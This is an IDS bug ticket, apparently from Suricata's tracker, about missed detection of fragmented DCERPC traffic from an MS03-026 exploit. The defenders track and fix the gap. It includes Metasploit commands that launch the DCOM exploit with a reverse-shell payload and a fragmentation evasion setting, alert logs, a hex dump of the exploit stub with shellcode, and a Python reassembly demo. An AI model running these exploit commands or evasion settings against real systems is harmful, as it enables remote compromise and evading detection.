Bug #206

Missed detection when dealing with fragmented RPC traffic (ms03-026)

Added by Will Metcalf about 12 years ago. Updated almost 12 years ago.

Status: Closed
Priority: Normal

Description

The attached pcap is generated from metasploit for ms03-026. We seem to alert properly for all available evasion techniques in metasploit except for the use of rpc frags. Setting the following, we only alert on the cmd banner post-exploitation.

use exploit/windows/dcerpc/ms03_026_dcom
set PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.78.254
set RHOST 192.168.78.21
set DCERPC::ReadTimeout 65535
set DCERPC::max_frag_size 20
exploit

src/suricata -s ../current-all-blah-newer.rules -l ./ -c suricata.yaml -r ms03_026_dcom-max_frag_size.pcap

Exploitation is successful and we get:

07/07/10-20:30:26.609011 [**] [1:2123:4] ATTACK-RESPONSES Microsoft cmd.exe banner [**] [Classification: Successful Administrator Privilege Gain] [Priority: 3] {6} 192.168.78.21:1040 -> 192.168.78.254:4444 [Xref => http://cgi.nessus.org/plugins/dump.php3?id=11633]

We should see:

07/07/10-20:35:03.679795 [**] [1:3409:7] NETBIOS DCERPC NCACN-IP-TCP IActivation remoteactivation overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 3] {6} 192.168.78.254:47683 -> 192.168.78.21:135 [Xref => http://www.securityfocus.com/bid/8205][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0352][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0715][Xref => http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx][Xref => http://www.microsoft.com/technet/security/bulletin/MS03-039.mspx]
07/07/10-20:35:03.679795 [**] [1:2002908:4] ET EXPLOIT x86 JmpCallAdditive Encoder [**] [Classification: Executable code was detected] [Priority: 3] {6} 192.168.78.254:47683 -> 192.168.78.21:135 [Xref => http://doc.emergingthreats.net/bin/view/Main/2002908][Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders]
07/07/10-20:35:03.791672 [**] [1:2123:4] ATTACK-RESPONSES Microsoft cmd.exe banner [**] [Classification: Successful Administrator Privilege Gain] [Priority: 3] {6} 192.168.78.21:1040 -> 192.168.78.254:4444 [Xref => http://cgi.nessus.org/plugins/dump.php3?id=11633]


Actions #1

Updated by Kirby Kuehl about 12 years ago

Will, can you try this again with the patch contained in Bug ID #200?

Actions #2

Updated by Will Metcalf about 12 years ago

Still missing detection for this one.

Actions #3

Updated by Kirby Kuehl about 12 years ago

This patch fixes handling multiple DCERPC fragments within a single packet.
When dumping the UUID and the fully assembled DCERPC fragment, everything looks the same as the fully reassembled packet shown in frame 14 of this ticket's pcap. The attached patch is critical.

Actions #4

Updated by Kirby Kuehl about 12 years ago

The alert:
sid:3409 in VRT rules

The UUID suricata decodes:

BIND UUID [ 0] Accepted 4d9f4ab87d1c11cf861e0020af6e7c57 Major Version 0x0000 Minor Version 0x0000


The opnum suricata decodes:
Opnum 0x00

The fully reassembled stubdata:
[0000]   05 00 01 00 00 00 00 00   00 00 00 00 C4 5E 74 E5   ........ ......t.
[0010]   D8 56 3D 46 D4 64 88 E1   8E 3F 4E AC 00 00 00 00   .V.F.d.. ..N.....
[0020]   00 00 00 00 00 00 00 00   00 00 00 00 00 00 00 00   ........ ........
[0030]   34 A6 AB 12 FD 02 00 00   00 00 00 00 FD 02 00 00   4....... ........
[0040]   5C 00 5C 00 0B F9 43 49   34 3F 1D 0C 4E 67 25 91   ......CI 4...Ng..
[0050]   BA BB B4 05 4F 47 66 35   B7 BE 98 BF 7D 04 2C 9F   ....OGf5 ........
[0060]   B3 D4 32 FC EB 10 EB 19   C6 16 00 01 23 37 F3 77   ..2..... .....7.w
[0070]   EB E0 FD 7F 15 79 04 BB   90 71 27 91 9B BE 09 F8   .....y.. .q......
[0080]   9F 46 4B 99 D5 7E 14 2A   E1 39 EB 35 B6 B0 98 B5   .FK..... .9.5....
[0090]   3B FD F5 4A 4F 05 7F 1D   B4 A8 43 A9 42 BB 03 D4   ...JO... ..C.B...
[00a0]   49 80 FC B3 B8 93 BA 04   4E 7C 19 F9 3D 40 66 41   I....... N.....fA
[00b0]   3C B1 3A E2 15 0C B7 34   25 47 1C 8D 96 BF 67 97   .......4 .G....g.
[00c0]   92 37 B9 2D 90 48 24 B2   2C 33 D6 3F EB 04 51 F4   .7...H.. .3....Q.
[00d0]   25 AD 4E EB 04 9F 4B FD   A8 96 EB 04 EB 04 97 96   ..N...K. ........
[00e0]   1C 47 EB 04 B8 D7 25 46   97 71 05 88 E1 41 A8 78   .G.....F .q...A.x
[00f0]   47 33 F5 7F 2C 98 49 14   B6 40 89 E3 7B 39 F6 D1   G3....I. .....9..
[0100]   E0 41 79 72 02 EB 35 B1   B4 3D 8D 86 D6 7E 20 E1   .Ayr..5. ........
[0110]   77 7C 25 28 D4 B0 3F A8   75 47 B5 0B F5 7A 6B F9   w....... uG...zk.
[0120]   98 10 F8 93 BF 4F 71 3C   B6 03 D5 92 B3 B7 04 74   .....Oq. .......t
[0130]   2C 9F 66 46 73 05 34 80   FD 22 FC B8 99 1C 37 2D   ..fFs.4. ......7.
[0140]   7F 15 0C 70 1D 4A 4B 96   A9 7D 43 B2 BA 76 78 4E   ...p.JK. ..C..vxN
[0150]   B9 BE BB 84 E2 42 90 91   14 40 48 67 97 49 9B 24   .....B.. ..Hg.I..
[0160]   74 79 75 73 21 E1 27 BA   27 B2 91 7C 4B 2D BB B9   tyus.... ....K...
[0170]   A8 05 1C 37 81 FE C1 EB   3F 66 47 1D 04 2B F5 93   ...7.... .fG.....
[0180]   70 69 FC B8 96 08 FD 41   98 B5 25 01 F9 48 0C 3D   pi.....A .....H..
[0190]   78 3C 77 0B D4 7A 46 34   B0 B1 BE 33 D6 8D 86 E2   x.w..zF4 ...3....
[01a0]   42 39 E3 72 49 7F 35 4F   4E A9 2C 76 7E 15 9B B7   B9.rI.5O N..v....
[01b0]   12 F8 92 67 B4 B6 9F 24   99 BF 43 B3 4A 97 71 40   ...g.... ..C.J.q.
[01c0]   90 7D 7B 2B D1 E0 14 66   23 D5 76 7F 7B 43 A9 15   .......f ..v..C..
[01d0]   A8 7E 4A 73 1D B3 31 E2   7A 4B 99 77 22 F5 3C 7C   ..Js..1. zK.w....
[01e0]   46 B2 71 41 09 F8 2D 97   74 38 D6 BF B7 78 29 EB   F.qA.... t8...x..
[01f0]   42 70 30 E0 27 72 18 E1   47 96 37 3D BA 49 4F B9   Bp0..r.. G.7..IO.
[0200]   B5 91 98 25 1C 48 21 F6   D5 8D 40 34 B6 67 2C BB   .....H.. ...4.g..
[0210]   75 24 BE 93 4E B0 3A D4   92 90 19 E3 3B FD B4 0C   u...N... ........
[0220]   9F 04 B8 B1 83 D3 D0 FC   7D 35 3F 14 79 05 9B 87   ........ .5..y...
[0230]   F9 4E 70 71 7D 79 01 D6   89 EB 27 BE A9 97 BA 11   .Npq.y.. ........
[0240]   E3 6B D4 8C E2 73 43 B4   84 E1 72 7F 41 7C 76 74   .k...sC. ..r.A.vt
[0250]   32 D5 1C 05 A8 14 B6 35   92 25 0C B1 B5 B9 9B 40   2......5 ........
[0260]   9F 78 48 98 47 2A F5 66   BB 10 F9 81 E0 04 1B F8   .xH.G..f ........
[0270]   2D 75 7E 77 46 BF 7A 4F   7B 34 37 96 3D 4B 7E 13   .u.wF.zO .47..K..
[0280]   F7 E0 77 2C 93 B3 88 FC   7D 3C 78 28 E2 08 E1 02   ..w..... ..x.....
[0290]   EB 15 76 03 D2 E3 4A 91   99 B7 7C 24 90 67 B2 85   ..v...J. .....g..
[02a0]   FD B0 75 3F 71 65 72 4D   4A 79 77 76 69 72 66 50   ..u.qerM JywvirfP
[02b0]   4B 75 4B 66 34 61 34 6C   77 31 4C 6C 43 31 39 63   KuKf4a4l w1LlC19c
[02c0]   6A 4D 66 4B 78 52 51 58   4E 47 76 66 75 55 45 4C   jMfKxRQX NGvfuUEL
[02d0]   4F 33 6D 4F 4D 6E 30 49   61 70 7A 4A 46 41 61 45   O3mOMn0I apzJFAaE
[02e0]   67 58 72 33 6F 57 6D 63   6B 58 30 6B 45 78 76 30   gXr3oWmc kX0kExv0
[02f0]   6B 53 73 59 6E 52 39 4E   4C 43 74 59 65 4E 6D 7A   kSsYnR9N LCtYeNmz
[0300]   4E 4A 49 6E 37 57 46 78   42 70 4D 75 63 32 45 56   NJIn7WFx BpMuc2EV
[0310]   44 64 41 4E 41 71 6A 5A   74 4B 48 77 52 71 7A 53   DdANAqjZ tKHwRqzS
[0320]   5A 69 30 6A 36 68 30 55   55 6D 51 6C 65 30 4A 44   Zi0j6h0U UmQle0JD
[0330]   4A 4D 37 42 32 77 58 39   52 35 38 57 66 6B 6B 63   JM7B2wX9 R58Wfkkc
[0340]   79 37 6A 57 52 61 59 73   46 6E 4D 7A 49 59 76 62   y7jWRaYs FnMzIYvb
[0350]   49 41 4D 5A 37 32 65 6A   6D 56 69 73 72 50 61 76   IAMZ72ej mVisrPav
[0360]   33 7A 4F 61 5A 59 4A 59   30 6D 32 35 34 63 45 4B   3zOaZYJY 0m254cEK
[0370]   78 33 8B 45 30 05 24 FB   FF FF FF E0 EB F4 64 64   x3.E0... ......dd
[0380]   0B 0B 1B 00 56 78 49 72   61 66 45 32 46 37 44 68   ....VxIr afE2F7Dh
[0390]   6D 79 72 47 32 61 66 35   55 78 65 73 34 50 4D 71   myrG2af5 Uxes4PMq
[03a0]   31 69 33 49 45 71 78 43   62 4A 77 54 58 76 44 78   1i3IEqxC bJwTXvDx
[03b0]   76 66 37 73 61 31 6F 57   EB 06 55 55 59 1C 00 01   vf7sa1oW ..UUY...
[03c0]   8B 44 24 FC 05 E0 FA FF   FF FF E0 33 74 33 4A 50   .D...... ...3t3JP
[03d0]   6D 77 63 77 4F 4A 6F 49   46 45 54 4F 66 78 36 5A   mwcwOJoI FETOfx6Z
[03e0]   58 50 75 69 6D 4E 47 47   48 4C 31 67 72 76 5C 00   XPuimNGG HL1grv..
[03f0]   00 00 00 00 00 00 00 00   FF 6A C0 26 E7 72 F4 A0   ........ .j...r..
[0400]   01 00 00 00 54 F7 3E CD   01 00 00 00 94 5E 5A 50   ....T... ......ZP
[0410]   D0 86 24 28 37 75 B1 45   01 FF D7 8B 01 00 00 00   ....7u.E ........
[0420]   01 00 00 00 32 8B 60 C6                             ....2... 
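
The fragmentation evasion from the description and the two things comments #3 and #4 turn on, decoding several DCERPC PDUs that sit back to back in one packet and pulling the accepted interface UUID and opnum out of the bind and request, as an added example that is not part of this ticket or of Suricata's own code. It builds a bind plus a request whose stub is split into DCERPC fragments the way Metasploit's DCERPC::max_frag_size does, packs all the request fragments into one TCP payload, and shows that a content match run over each fragment separately misses a pattern that straddles a fragment boundary while the reassembled stub matches. The stub bytes, the MARKER pattern and the segment layout are constructed for illustration and are not the exploit or the sid:3409 content; the only real values are the interface UUID accepted in the bind in comment #4 (IRemoteActivation) and the NDR transfer syntax UUID.

```python
import struct
import uuid

# Connection-oriented DCERPC (DCE 1.1 RPC): 16-byte common header, then a type-specific body
PTYPE_REQUEST, PTYPE_BIND = 0, 11
PFC_FIRST_FRAG, PFC_LAST_FRAG = 0x01, 0x02
HDR_FMT = "<BBBB4sHHI"  # ver, minor, ptype, pfc_flags, drep, frag_length, auth_length, call_id
HDR_LEN = struct.calcsize(HDR_FMT)
# Real values: the interface UUID accepted by the bind in comment #4, and the NDR transfer syntax
IREMOTEACTIVATION = uuid.UUID("4d9f4ab8-7d1c-11cf-861e-0020af6e7c57")
NDR_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")
# Constructed stand-in for a rule's content match; this is NOT the VRT sid:3409 pattern
MARKER = b"\\\\" + b"A" * 40


def build_pdu(ptype, flags, call_id, body):
    # Little-endian data representation (drep 0x10), no auth trailer
    hdr = struct.pack(HDR_FMT, 5, 0, ptype, flags, b"\x10\x00\x00\x00", HDR_LEN + len(body), 0, call_id)
    return hdr + body


def build_bind(call_id, abstract, version):
    # One presentation context: abstract syntax + NDR transfer syntax v2
    ctx = struct.pack("<HBB", 0, 1, 0) + abstract.bytes_le + struct.pack("<I", version)
    ctx += NDR_SYNTAX.bytes_le + struct.pack("<I", 2)
    body = struct.pack("<HHIB3x", 5840, 5840, 0, 1) + ctx  # max_xmit, max_recv, assoc_group, n_ctx
    return build_pdu(PTYPE_BIND, PFC_FIRST_FRAG | PFC_LAST_FRAG, call_id, body)


def build_request(call_id, ctx_id, opnum, stub, max_frag_size):
    # Fragment the stub the way DCERPC::max_frag_size does: every fragment repeats
    # alloc_hint/ctx_id/opnum; FIRST_FRAG on the first PDU, LAST_FRAG on the last
    chunks = [stub[i:i + max_frag_size] for i in range(0, len(stub), max_frag_size)] or [b""]
    pdus = []
    for i, chunk in enumerate(chunks):
        flags = (PFC_FIRST_FRAG if i == 0 else 0) | (PFC_LAST_FRAG if i == len(chunks) - 1 else 0)
        pdus.append(build_pdu(PTYPE_REQUEST, flags, call_id, struct.pack("<IHH", len(stub), ctx_id, opnum) + chunk))
    return pdus


def split_pdus(segment):
    # Walk one TCP payload by frag_length and return every complete PDU in it. A parser that
    # decodes only the first PDU per packet drops the rest, which is what comment #3 fixes.
    pdus, off = [], 0
    while off + HDR_LEN <= len(segment):
        ver, _, ptype, flags, _, frag_len, _, call_id = struct.unpack_from(HDR_FMT, segment, off)
        if ver != 5 or frag_len < HDR_LEN or off + frag_len > len(segment):
            break  # malformed or truncated; a stream parser would buffer and wait for more data
        pdus.append({"ptype": ptype, "flags": flags, "call_id": call_id, "body": segment[off + HDR_LEN:off + frag_len]})
        off += frag_len
    return pdus


def parse_bind_uuids(body):
    # [(abstract syntax UUID, version)] for each presentation context in a bind body
    n_ctx, off, out = body[8], 12, []
    for _ in range(n_ctx):
        _, n_transfer = struct.unpack_from("<HB", body, off)
        out.append((uuid.UUID(bytes_le=body[off + 4:off + 20]), struct.unpack_from("<I", body, off + 20)[0]))
        off += 24 + 20 * n_transfer
    return out


def reassemble_requests(pdus):
    # Accumulate request stubs per call_id from FIRST_FRAG to LAST_FRAG; return completed calls
    pending, completed = {}, []
    for pdu in pdus:
        if pdu["ptype"] != PTYPE_REQUEST:
            continue
        _, ctx_id, opnum = struct.unpack_from("<IHH", pdu["body"], 0)
        cid = pdu["call_id"]
        if pdu["flags"] & PFC_FIRST_FRAG:
            pending[cid] = {"ctx_id": ctx_id, "opnum": opnum, "stub": bytearray()}
        if cid not in pending:
            continue  # fragment without a preceding first fragment: drop it
        pending[cid]["stub"] += pdu["body"][8:]
        if pdu["flags"] & PFC_LAST_FRAG:
            done = pending.pop(cid)
            done["stub"] = bytes(done["stub"])
            completed.append(done)
    return completed


def demo(max_frag_size=20):
    # Constructed traffic: a bind, then a request whose fragments all share one TCP segment
    stub = b"\x05\x00\x01\x00" + bytes(12) + MARKER + bytes(16)  # constructed stub, not the exploit's
    segments = [build_bind(1, IREMOTEACTIVATION, 0), b"".join(build_request(2, 0, 0, stub, max_frag_size))]
    pdus = [p for seg in segments for p in split_pdus(seg)]
    binds = [p for p in pdus if p["ptype"] == PTYPE_BIND]
    requests = [p for p in pdus if p["ptype"] == PTYPE_REQUEST]
    calls = reassemble_requests(pdus)
    return {
        "pdus_in_second_segment": len(split_pdus(segments[1])),
        "bind_uuid": str(parse_bind_uuids(binds[0]["body"])[0][0]),
        "opnum": calls[0]["opnum"],
        "stub_intact": calls[0]["stub"] == stub,
        "per_fragment_hits": sum(MARKER in p["body"][8:] for p in requests),  # naive per-PDU matching
        "reassembled_hits": sum(MARKER in c["stub"] for c in calls),
    }


if __name__ == "__main__":
    print(demo())      # fragmented at 20 bytes: per_fragment_hits 0, reassembled_hits 1
    print(demo(4096))  # unfragmented: both 1
```

With a 20-byte fragment size the 42-byte MARKER never lands inside one PDU, so per-fragment matching reports nothing while the reassembled stub still carries it, which is the shape of the miss in the description; with the fragment size raised above the stub length both paths agree. The reassembler keys on call_id only and trusts the flags, which is enough for this demonstration but not for hostile traffic: a production parser also has to handle fragments split across TCP segments, interleaved calls, and a PDU whose frag_length runs past the segment.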

Actions #5

Updated by Victor Julien about 12 years ago

Applied, thanks Kirby. What else needs to be done?

Actions #6

Updated by Victor Julien about 12 years ago

  • % Done changed from 50 to 80

Current master alerts on 3409 and 2123. Sig 2002908 doesn't fire.

Actions #7

Updated by Victor Julien about 12 years ago

  • Estimated time changed from 2.50 h to 12.50 h

Actions #8

Updated by Victor Julien about 12 years ago

  • Due date changed from 07/10/2010 to 08/23/2010
  • Target version changed from 1.0.1 to 1.0.2
  • Estimated time changed from 12.50 h to 15.00 h

Reverted to the old code in git master as we found too many issues. Re-targeting to 1.0.2.

Actions #9

Updated by Victor Julien about 12 years ago

  • Due date changed from 08/23/2010 to 09/15/2010
  • Target version changed from 1.0.2 to 1.1beta1

Actions #10

Updated by Victor Julien almost 12 years ago

  • Status changed from New to Closed
  • % Done changed from 80 to 100

Now getting:

07/07/10-20:30:26.365349 [**] [1:3409:7] NETBIOS DCERPC NCACN-IP-TCP IActivation remoteactivation overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 3] {TCP} 192.168.78.254:52952 -> 192.168.78.21:135
07/07/10-20:30:26.609011 [**] [1:2123:4] ATTACK-RESPONSES Microsoft cmd.exe banner [**] [Classification: Successful Administrator Privilege Gain] [Priority: 3] {TCP} 192.168.78.21:1040 -> 192.168.78.254:4444

Sid 2002908 doesn't match, but I think it shouldn't on this pcap. Btw, the alerts in the original report show a tcp session that is not present in the pcap: 192.168.78.254:47683 -> 192.168.78.21:135
